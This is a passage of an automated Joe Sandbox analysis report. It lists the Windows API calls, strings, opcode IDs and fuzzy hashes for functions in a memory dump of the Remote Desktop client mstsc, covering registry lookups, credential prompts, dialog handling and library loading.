                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                                                                                                        • API String ID: 2288772661-3337323198
                                                                                                                                                                                        • Opcode ID: 51108d1f8568baec4dec1d7ad243978e2a8ee4ddb8fc171af9bc7672391149e0
                                                                                                                                                                                        • Instruction ID: 90d416ceb2b86ed179c43d51e33ed9df3e24eaff959b4fa1a9b00accdadd947d
                                                                                                                                                                                        • Opcode Fuzzy Hash: 51108d1f8568baec4dec1d7ad243978e2a8ee4ddb8fc171af9bc7672391149e0
                                                                                                                                                                                        • Instruction Fuzzy Hash: E151F171219305AFEB29DF24C944FAA7BE9EF89304F04091DF98187261D771DD90DB82
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 008E45D2: _vsnwprintf.MSVCRT ref: 008E4604
                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32 ref: 0091D9AD
                                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0091DA82
                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0091DA93
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CloseEnumOpenValue_vsnwprintf
                                                                                                                                                                                        • String ID: SOFTWARE\Microsoft\Terminal Server Client\%s$\
                                                                                                                                                                                        • API String ID: 143769899-3337323198
                                                                                                                                                                                        • Opcode ID: a75fb0546227273e2d6bc3cbed6289cd05b8b915426ea7519cd41ebb3b6d07a1
                                                                                                                                                                                        • Instruction ID: ebfd00b65aebe76dff8bf4d01f4b2c9019929de6d3752a3913c4904dfc7fa955
                                                                                                                                                                                        • Opcode Fuzzy Hash: a75fb0546227273e2d6bc3cbed6289cd05b8b915426ea7519cd41ebb3b6d07a1
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6641EFB1606218AADB28DF55DC88FFB7B6DEF49304F040099EA0997251D771DE84CFA4
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CredUIPromptForWindowsCredentialsW.CREDUI(00000014,?,?,00000000,?,?,00000000,?,?,00000000,00000000,00000000), ref: 0091B19F
                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0091B1B0
                                                                                                                                                                                          • Part of subcall function 0091B603: LsaConnectUntrusted.SECUR32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091B61C
                                                                                                                                                                                          • Part of subcall function 0091B603: LsaDeregisterLogonProcess.SECUR32(00000000), ref: 0091B6D0
                                                                                                                                                                                        • memcpy.MSVCRT(00000000,?,00000000), ref: 0091B1C7
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0091B227
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • GetAuthenticationPackageId failed!, xrefs: 0091B14D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Free$AddressAllocConnectCredCredentialsDeregisterHandleLibraryLocalLogonMessageModuleProcProcessPromptTaskTraceUntrustedWindowsmemcpy
                                                                                                                                                                                        • String ID: GetAuthenticationPackageId failed!
                                                                                                                                                                                        • API String ID: 2033552025-2246485560
                                                                                                                                                                                        • Opcode ID: 5f8c2cba88637d09cb5b23b8b8667fcb67924c71c4ba6e6ca2c2f96f9b928df4
                                                                                                                                                                                        • Instruction ID: f8d023c273a55598efa3bc6e176b69f46fad3b3aec60a0bbe7fdafc5f7b04a9f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5f8c2cba88637d09cb5b23b8b8667fcb67924c71c4ba6e6ca2c2f96f9b928df4
                                                                                                                                                                                        • Instruction Fuzzy Hash: C1519771A0420DAFDF29CF99C888BEEBBBAFF58300F144469E910E7261D731D9849B51
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 00920BC7: GetDlgItem.USER32(00000000,?), ref: 00920BD8
                                                                                                                                                                                          • Part of subcall function 00920BC7: EnableWindow.USER32(00000000,750BDBF5), ref: 00920BE6
                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,00003345,000000F1,00000000,00000000,00003346,?,750BDBF5,?,?,?,00000000,?,00000000), ref: 0090C288
                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,0000334A,00000144,00000000,00000000,?,00000000,?), ref: 0090C2B5
                                                                                                                                                                                        • SendDlgItemMessageW.USER32(?,0000334A,0000014E,?,00000000,?,008D7260,008D7240,00000002,?,?,00000000,?), ref: 0090C336
                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00003348,00000000,008D7248,00000002,00000000,?,00000000), ref: 0090C364
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • AddStringToComboBox failed!, xrefs: 0090C394
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Item$MessageSend$EnableTextWindow
                                                                                                                                                                                        • String ID: AddStringToComboBox failed!
                                                                                                                                                                                        • API String ID: 3122374576-2926826431
                                                                                                                                                                                        • Opcode ID: bf0cff7aea07de0c87cec70447a440a1e1a63d12262c899b49edf40fa0d1c079
                                                                                                                                                                                        • Instruction ID: 191969ec38216917d2a199bb6688654ff41a983ebe8b5e24e9b6a8e41ab0660a
                                                                                                                                                                                        • Opcode Fuzzy Hash: bf0cff7aea07de0c87cec70447a440a1e1a63d12262c899b49edf40fa0d1c079
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D4103B1614305BFDB298B64CC4ABACBBA5FB44B50F00C265F915AA2E0D770AE50DB80
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,009039E2,?,00000000,?,008E569A,?), ref: 008E82C5
                                                                                                                                                                                          • Part of subcall function 008F3BBC: memset.MSVCRT ref: 008F3C13
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • QI for IID_IMsRdpClientNonScriptable4 failed!, xrefs: 008E8327
                                                                                                                                                                                        • ApplyRDPSigningSettings failed!, xrefs: 008E8379
                                                                                                                                                                                        • StartRemoteApplication failed, xrefs: 008E8404
                                                                                                                                                                                        • ApplyTSWASettings failed!, xrefs: 008E83BF
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: HandleModulememset
                                                                                                                                                                                        • String ID: ApplyRDPSigningSettings failed!$ApplyTSWASettings failed!$QI for IID_IMsRdpClientNonScriptable4 failed!$StartRemoteApplication failed
                                                                                                                                                                                        • API String ID: 1044559590-403600509
                                                                                                                                                                                        • Opcode ID: 644173541b7362a96d697b990c7e24f6db216b7935dcf0e45c8472a7f12d6cba
                                                                                                                                                                                        • Instruction ID: e1895cf7def723b3703e98e4a4c35d9335371393e441dc488de2a187f86ff948
                                                                                                                                                                                        • Opcode Fuzzy Hash: 644173541b7362a96d697b990c7e24f6db216b7935dcf0e45c8472a7f12d6cba
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1841A731604396EFDB298A9AC949F2D7B96FB46318F040098F944DB2E2CB74DD40DB56
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • wcstok_s.MSVCRT ref: 00926130
                                                                                                                                                                                          • Part of subcall function 00934E47: EventActivityIdControl.ADVAPI32(00000001,00000000,0093A020,00000000,00000000,00000000), ref: 00934E6E
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ActivityControlEventwcstok_s
                                                                                                                                                                                        • String ID: Field in SignScope not found in store$RecordToString failed$SignScope$SignScope field not found in store
                                                                                                                                                                                        • API String ID: 1933954927-1973409768
                                                                                                                                                                                        • Opcode ID: 495440d4f246f83b8620c9d853b9c9dfa747fb95787207300ca071e962487856
                                                                                                                                                                                        • Instruction ID: 5f31e7cd8b86d5aedd4f6fe9b096ec5baeedd58f136c91c741b2c1f5d7d2d8fa
                                                                                                                                                                                        • Opcode Fuzzy Hash: 495440d4f246f83b8620c9d853b9c9dfa747fb95787207300ca071e962487856
                                                                                                                                                                                        • Instruction Fuzzy Hash: DC415371604320AADB3C8A54A959B2A7BADFF82314F140069F851D7796CA34DD04CBD1
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0092EAB3
                                                                                                                                                                                        • BeginPaint.USER32(?,00000000), ref: 0092EAC0
                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 0092EACA
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        • EndPaint.USER32(?,00000000), ref: 0092EB85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • ForwardMessageToControl failed, xrefs: 0092EB56
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Paint$AddressBeginErrorFreeHandleLastLibraryMessageModuleProcTracememset
                                                                                                                                                                                        • String ID: ForwardMessageToControl failed
                                                                                                                                                                                        • API String ID: 2462654298-2091418350
                                                                                                                                                                                        • Opcode ID: 46e0cdbc8539f95960821500330f8f23d35a02e29863d3bd464b26b25fc8f1f3
                                                                                                                                                                                        • Instruction ID: 70e01370a1ba3231db1437fc678b23c8678a6a25c697fd27548fe864ca64945e
                                                                                                                                                                                        • Opcode Fuzzy Hash: 46e0cdbc8539f95960821500330f8f23d35a02e29863d3bd464b26b25fc8f1f3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4931A132900328ABDB25DF96ECC9F6A7BA9FB05360F100555F942EB2A5D630EC01DF91
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • TraceMessage.ADVAPI32(?,008FE339,0000002B,008FE339,?,?,00000004,NULL,0000000A,NULL,0000000A,00000000,MRU0,00000000,Default,008FE339), ref: 008F6AC4
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessageTrace
                                                                                                                                                                                        • String ID: <NULL>$Default$MRU0$NULL
                                                                                                                                                                                        • API String ID: 471583391-1578344839
                                                                                                                                                                                        • Opcode ID: 4ad3c85bcc4973b9bb6577bec8c263a2e572dfe22238469499b0a2ec4e886210
                                                                                                                                                                                        • Instruction ID: 0d40109ac61a05396a232418d0cce5ad6da8163391fd24f7cf0d69afb197787b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ad3c85bcc4973b9bb6577bec8c263a2e572dfe22238469499b0a2ec4e886210
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E21D636A0021DEBDF249F74C841ABA7B75FB84714F24C22AEB05EB250F6719E61D790
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CertFindExtension.CRYPT32(2.5.29.37,?,?), ref: 00934303
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000), ref: 00934378
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: CertExtensionFindFreeLocal
                                                                                                                                                                                        • String ID: 2.5.29.37
                                                                                                                                                                                        • API String ID: 2896064161-3842544949
                                                                                                                                                                                        • Opcode ID: 72b660a4389517327cee8ffbb86c258687a5aa3c873c873bd674440d73a61204
                                                                                                                                                                                        • Instruction ID: 43adb0703c4b225525e789b554bfeb45463e2b6dd434f250efc8bc4ca6c7dbfc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 72b660a4389517327cee8ffbb86c258687a5aa3c873c873bd674440d73a61204
                                                                                                                                                                                        • Instruction Fuzzy Hash: BB210E76601224EFCB108F94CD45EAEBFA9EF84760F128059F8059B321EB30AD00DFA0
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,0000000F,00000000,?), ref: 0091A45A
                                                                                                                                                                                          • Part of subcall function 0091A2F3: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?), ref: 0091A325
                                                                                                                                                                                          • Part of subcall function 0091A2F3: RegQueryValueExA.ADVAPI32 ref: 0091A366
                                                                                                                                                                                          • Part of subcall function 0091A2F3: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 0091A385
                                                                                                                                                                                          • Part of subcall function 0091A2F3: RegCloseKey.ADVAPI32(?), ref: 0091A3AB
                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000000,00000000,?), ref: 0091A413
                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(hhctrl.ocx,?,?,00000000,?), ref: 0091A430
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                                        • String ID: hhctrl.ocx$mstsc.chm
                                                                                                                                                                                        • API String ID: 1060647816-3096909771
                                                                                                                                                                                        • Opcode ID: 7dfb4d053431b8f36a32292ee8cd2ee3f2b2b493e95e0446e4182cdcd5f30776
                                                                                                                                                                                        • Instruction ID: 87e9b82e0b6e4b772ce6a0365c84322f0894af22bcd24c8b0c773c624982d0c3
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7dfb4d053431b8f36a32292ee8cd2ee3f2b2b493e95e0446e4182cdcd5f30776
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4211C474719609AFE724DF65EC18FBA73ECEB54304F00402EE542D22A0EBB49C40AF12
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                        • String ID: Advapi32.dll$EventActivityIdControl
                                                                                                                                                                                        • API String ID: 4061214504-2884944642
                                                                                                                                                                                        • Opcode ID: fe566f207a55e6a51e4b0c05125f851117b0a9d127065905685a581289b848fa
                                                                                                                                                                                        • Instruction ID: 373e2c60b52425fbc7911edb8d4b14bd1a017a6b4ebac7b61347613d3fbbf47f
                                                                                                                                                                                        • Opcode Fuzzy Hash: fe566f207a55e6a51e4b0c05125f851117b0a9d127065905685a581289b848fa
                                                                                                                                                                                        • Instruction Fuzzy Hash: 85F08130754609AFDB10DFE5DD0AABFB7B8FF84701F000068E515E2190DB709E019B52
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Ntdll.dll,?,?,008E61DC), ref: 008E617B
                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,008E61DC), ref: 008E6199
                                                                                                                                                                                        • GetProcAddress.KERNEL32(WinSqmAddToStream,?,?,008E61DC), ref: 008E61A6
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                        • String ID: Ntdll.dll$WinSqmAddToStream
                                                                                                                                                                                        • API String ID: 145871493-93134304
                                                                                                                                                                                        • Opcode ID: e5bf68068bfed4bba57f690f4c10a10273a56af6b8b7b029648855fb091f087e
                                                                                                                                                                                        • Instruction ID: 26bc0952bea4607d756913dbf1baa3c1c669c376b579931b4a36671bbd66c642
                                                                                                                                                                                        • Opcode Fuzzy Hash: e5bf68068bfed4bba57f690f4c10a10273a56af6b8b7b029648855fb091f087e
                                                                                                                                                                                        • Instruction Fuzzy Hash: 4EF0A0716282619B9B3207ABAC0C407B6A5EFE2B613044039E494D2235EE30CC11EF92
                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0090D3B6: SendDlgItemMessageW.USER32(?,00003344,000000F0,00000000,00000000,00000001,000000FC,00003AA2,0090CAC7,00000001,TscProxyLinkDelSavedCreds,000000FC), ref: 0090D3D4
                                                                                                                                                                                        • memset.MSVCRT ref: 0090CADF
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E2C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,008D7B50,0000000B,008E396B,00000004,00913BC2,00000004,00000000,?,00913BC2,008E396B,00000000,00000000,00000000), ref: 008E2C85
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Message$AddressFreeHandleItemLibraryModuleProcSendTracememset
                                                                                                                                                                                        • String ID: GetEffectiveAuthMode failed!$O3$StringCchLength failed$TscProxyLinkDelSavedCreds
                                                                                                                                                                                        • API String ID: 3255493412-3188623267
                                                                                                                                                                                        • Opcode ID: 8e00a15e31f287ca3f33ae44c1894b940ef9e7841861d1ee342be80bbf092c55
                                                                                                                                                                                        • Instruction ID: b2bd87825576f02cfc8c63ffa7cf66aca8cba7391fadfbceb312fd5f4a13c577
                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e00a15e31f287ca3f33ae44c1894b940ef9e7841861d1ee342be80bbf092c55
                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C71D3B1A40318AFDB34DB68CC8DBA976A9EB49700F1006E9E549E72D1DB749E84CF05
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0090D231
                                                                                                                                                                                        • memset.MSVCRT ref: 0090D24B
                                                                                                                                                                                        • memset.MSVCRT ref: 0090D265
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                          • Part of subcall function 008E0EEC: TraceMessage.ADVAPI32(00000001,?,0000002B,008DB78C,00000046,00000008,00000004,00000000,00000005,00000000,00000004,00000000,0093A020,00000000,0093A020), ref: 008E0F32
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • Failed to create temporary AA profile, xrefs: 0090D33D
                                                                                                                                                                                        • GetEffectiveServerName failed!, xrefs: 0090D2B2
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: memset$AddressFreeHandleLibraryMessageModuleProcTrace
                                                                                                                                                                                        • String ID: Failed to create temporary AA profile$GetEffectiveServerName failed!
                                                                                                                                                                                        • API String ID: 2883347319-1722353693
                                                                                                                                                                                        • Opcode ID: 1b512be2be1e0210cac8cce329f762d72c8a249f9fa1870641ec48696d357cd3
                                                                                                                                                                                        • Instruction ID: 5b90c112bd85f67fb08644b0072f768f82401d578014864076efa274282c13f7
                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b512be2be1e0210cac8cce329f762d72c8a249f9fa1870641ec48696d357cd3
                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A419371A003086FDB25DBA4CC89FAB77EEEB88304F1044AAF505D7291EA71ED858F51
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00932298
                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 009322B5
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003301,00000000), ref: 009322DD
                                                                                                                                                                                        • CheckDlgButton.USER32(?,00003301,00000001), ref: 00932303
                                                                                                                                                                                        • CheckDlgButton.USER32(?,000036C6,00000000), ref: 0093230F
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ButtonCheck$EnableWindow
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 9982438-0
                                                                                                                                                                                        • Opcode ID: 9f9830b1b2a692dc33ab8f0a4e258f5e19961b4e4b7820a1ffab3e6cdc9f309d
                                                                                                                                                                                        • Instruction ID: a1b37e292c09215a74f83cbc3adfce4b56e7fea865b354c17441370772e0d5b6
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f9830b1b2a692dc33ab8f0a4e258f5e19961b4e4b7820a1ffab3e6cdc9f309d
                                                                                                                                                                                        • Instruction Fuzzy Hash: F2219C30A11116AFDB18CF24CC84F3ABBA9FF48741F204564E916EB6A0DB72AD54DF80
                                                                                                                                                                                        APIs
                                                                                                                                                                                        • memset.MSVCRT ref: 0090D0F7
                                                                                                                                                                                          • Part of subcall function 00928E3E: ??2@YAPAXI@Z.MSVCRT ref: 00928E50
                                                                                                                                                                                          • Part of subcall function 008E1040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 008E106D
                                                                                                                                                                                          • Part of subcall function 008E1040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 008E107F
                                                                                                                                                                                          • Part of subcall function 008E1040: FreeLibrary.KERNEL32(?), ref: 008E1094
                                                                                                                                                                                        Strings
                                                                                                                                                                                        • CTSCredManAssistant::CreateInstance failed!, xrefs: 0090D13C
                                                                                                                                                                                        • TERMSRV, xrefs: 0090D1DC
                                                                                                                                                                                        • GetEffectiveServerName failed!, xrefs: 0090D188
                                                                                                                                                                                        • TscProxyLinkDelSavedCreds, xrefs: 0090D0DD
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 0000001B.00000002.637776307.00000000008D0000.00000040.80000000.00040000.00000000.sdmp, Offset: 008D0000, based on PE: true
                                                                                                                                                                                        • Associated: 0000001B.00000002.637776307.000000000093C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_27_2_8d0000_mstsc.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ??2@AddressFreeHandleLibraryModuleProcmemset
                                                                                                                                                                                        • String ID: CTSCredManAssistant::CreateInstance failed!$GetEffectiveServerName failed!$TERMSRV$TscProxyLinkDelSavedCreds
                                                                                                                                                                                        • API String ID: 4238993307-2018271670
                                                                                                                                                                                        • Opcode ID: b45a17da472640dc02c6cfb444cce352bf9413370e4af541616426b231bfc269
